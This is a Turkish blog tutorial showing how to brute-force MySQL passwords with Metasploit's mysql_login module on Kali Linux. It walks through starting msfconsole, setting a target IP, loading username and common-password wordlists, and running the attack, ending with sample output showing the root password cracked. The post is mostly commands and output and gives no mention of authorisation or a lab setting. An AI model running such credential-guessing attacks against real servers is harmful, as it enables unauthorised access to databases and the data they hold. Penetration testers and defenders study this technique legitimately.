Metasploit ile Mysql Brute Force

Mysql şifresini bulmak istediğimiz bir sunucu ya da mysql kullanıcısı olduğunu düşünelim , şifreyi brute force yöntemi ile zorlayarak bulacağız , elimizde bir kullanıcı adı listesi ve bir de şifre listesi olsun , bu k.adı ve şifreleri hazır da bulabilirsiniz , kendinizde dilediğiniz algoritmaya göre farklı araçlar ile üretebilirsiniz , amacımız bu şifreleri metasploit ile mysql sunucusunda hızlıca denemek , işlem için metasploit i hazır bulunduran kali linux kullanacağız.

Öncelikle msfconsolu açalım.

root@ayhanarda:~# service postgresql start
root@ayhanarda:~# service metasploit start
root@ayhanarda:~# msfconsole

Şimdi msf console umuz açılmış durumda. Şimdi bu şifre denemelerini yapacak auxiliary modülümüzü açalım.

msf > use auxiliary/scanner/mysql/mysql_login

Şifre denemesi yapmak istediğimiz mysql serverın ip adresinin 192.168.1.10 olduğunu varsayalım. Şimdi msf üzerinde bunu set edelim.

msf auxiliary(mysql_login) > set RHOSTS 192.168.1.10

Şimdi denenmesi için hazırladığımız k.adlarını içeren dosyamızın yolunu gösterelim.

msf auxiliary(mysql_login) > set USER_FILE /root/user.lst

Bu dosyayı önceden hazırlayabilirsiniz , içeriği aşağıdaki gibi her satıra bir k.adı gelecek şekilde olmalı.

root@ayhanarda:~# cat /root/user.lst
admin
root
user
root_user
isimleri çoğaltabilirsiniz ya da k. adını zaten biliyorsanız sadece onu yazabilirsiniz.

Şimdi aynı şekilde şifreler içeren dosyamızın yolunu set edelim.Yol değişiklik gösterebilir , kali üzerinde dilediğiniz yolda oluşturabilir ve yolun ubuna göre set edebilirsiniz.

msf auxiliary(mysql_login) > set PASS_FILE /root/pass.lst

Şifre dosyasında her satıra bir denenecek şifre gelecek şekilde hazır olmalı.

root@ayhanarda:~# cat /root/pass.lst
password
123456
12345678
1234
qwerty
12345
dragon
ayhanarda
baseball
football
letmein
monkey
696969

Şimdi herşey tamam ise auxilary modulümüzü çalıştırmamız yeterli. Komutu verdikten sonra set ettiğimiz ip adresindeki myql servera dosyalarda belirtilen k.adları ve şifreler ile erişmeye çalışacak ve eğer sunucunun mysql şifresi dosyalarda yazanlardan biri ise Size bunu belirtecek. Çalıştırmak için aşağıdaki komutu kullanabilirsiniz.

msf auxiliary(mysql_login) > run

Şimdi sonuçlar aşağıdakine benzer olmalı ve görüldüğü gibi şifre ayhanarda imiş.

[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:password(Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:123456 (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:12345678 (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:1234 (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:qwerty (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:dragon (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))

[+] 192.168.1.10:3306 MYSQL – Success: ‘root:ayhanarda
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Ayhan ARDA

Share Button

Yorumlar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.